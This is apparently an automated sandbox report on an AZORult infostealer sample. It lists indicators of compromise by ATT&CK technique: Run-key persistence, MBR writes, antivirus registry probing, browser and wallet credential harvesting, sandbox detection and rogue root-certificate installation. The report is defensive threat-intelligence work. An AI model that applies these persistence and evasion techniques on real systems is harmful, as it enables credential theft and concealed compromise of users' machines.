azorult | 714822746c545d1d4e5561ce277d8e2542ddae6f591a34a0669b9af48663b8aa

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7053625.77
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7053625.77

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	7053625.77

Loads dropped DLL 23 IoCs

pid	Process
4340	MsiExec.exe
4900	Setup3310.tmp
4900	Setup3310.tmp
4536	kk1zazd4ft2.tmp
840	vict.tmp
2232	IBInstaller_97039.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
968	Setup.tmp
968	Setup.tmp
5176	03rmxcykcrh.tmp
5176	03rmxcykcrh.tmp
5176	03rmxcykcrh.tmp
5176	03rmxcykcrh.tmp
5176	03rmxcykcrh.tmp
5176	03rmxcykcrh.tmp
5176	03rmxcykcrh.tmp

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

themida 3 IoCs

Detects Themida, Advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000100000001abd0-172.dat	themida
behavioral1/files/0x000100000001abd0-173.dat	themida
behavioral1/memory/2420-229-0x00000000012C0000-0x00000000012C1000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\xz3htbuph3h = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\H1LE6BSJ01\\multitimer.exe\" 1 3.1615147620.60453264dc506"	multitimer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	1943025.21
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gcttt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\7053625.77"	7053625.77
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\4754135 = "\"C:\\Users\\Admin\\AppData\\Roaming\\l2jqvmywrba\\03rmxcykcrh.exe\" /VERYSILENT"	03rmxcykcrh.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\ML2MIW2OHVETQEE = "\"C:\\Program Files\\QH7COMMSFS\\QH7COMMSF.exe\""	QH7COMMSF.exe

Checks for any installed AV software in registry 1 TTPs 53 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7053625.77

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
103	ipinfo.io
177	checkip.amazonaws.com
182	ipinfo.io
204	ipinfo.io
215	ipinfo.io
32	api.ipify.org
99	ip-api.com
101	ipinfo.io

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe

Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4944	Setup.exe
2420	7053625.77

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4440 set thread context of 4584	4440	key.exe	89
PID 3824 set thread context of 4640	3824	2396.tmp.exe	95
PID 3604 set thread context of 4524	3604	C0CA61A12E4C8B38.exe	116
PID 3604 set thread context of 4788	3604	C0CA61A12E4C8B38.exe	123

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-QULI5.tmp	vpn.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-2O3M2.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-IMGP7.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-ARSBJ.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-DPOTK.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-H66TF.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\Venita.exe	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Refactoring.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-UU469.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\unins000.dat	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ipseccmd.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Interop.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\unins000.dat	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-EKCJO.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-9PLP1.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-V5B58.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-HNHPC.tmp	vpn.tmp
File created	C:\Program Files (x86)\JCleaner\is-IHPOM.tmp	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Globalization.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-FKMRA.tmp	vpn.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-F4PFV.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libCommon.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libeay32.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libMaskVPN.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-KS9CF.tmp	vpn.tmp
File created	C:\Program Files (x86)\viewerise\unins000.dat	kk1zazd4ft2.tmp
File created	C:\Program Files\QH7COMMSFS\QH7COMMSF.exe	r5a4soiop3w.exe
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Host.dll	IBInstaller_97039.tmp
File created	C:\Program Files\QH7COMMSFS\uninstaller.exe	r5a4soiop3w.exe
File created	C:\Program Files\QH7COMMSFS\uninstaller.exe.config	r5a4soiop3w.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-9BCEB.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-MH3IN.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-Q7URR.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Delphi.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-OEP9B.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-16UCL.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-F96II.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-37HVU.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-MJG08.tmp	vpn.tmp
File created	C:\Program Files (x86)\JCleaner\is-N3II3.tmp	chashepro3.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-34701.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-54HS3.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-0T2HJ.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-FDFOO.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPN.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-Q37VJ.tmp	vpn.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-OEV0P.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-R4IPI.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-JI4CS.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-CA4CE.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Delphi.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\unins000.dat	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-KE78F.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	kk1zazd4ft2.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	vict.tmp
File created	C:\Program Files\QH7COMMSFS\QH7COMMSF.exe.config	r5a4soiop3w.exe
File created	C:\Program Files (x86)\MaskVPN\is-P9CN5.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-00I7U.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-GPUKK.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-15URG.tmp	vpn.tmp

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	C0CA61A12E4C8B38.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	2396.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	2396.tmp.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
6888	schtasks.exe
5880	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
6564	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe

Kills process with taskkill 6 IoCs

evasion

pid	Process
5988	taskkill.exe
4544	taskkill.exe
3424	TASKKILL.exe
6232	taskkill.exe
580	taskkill.exe
4620	taskkill.exe

Modifies data under HKEY_USERS 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\PegasPc	file.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d323831323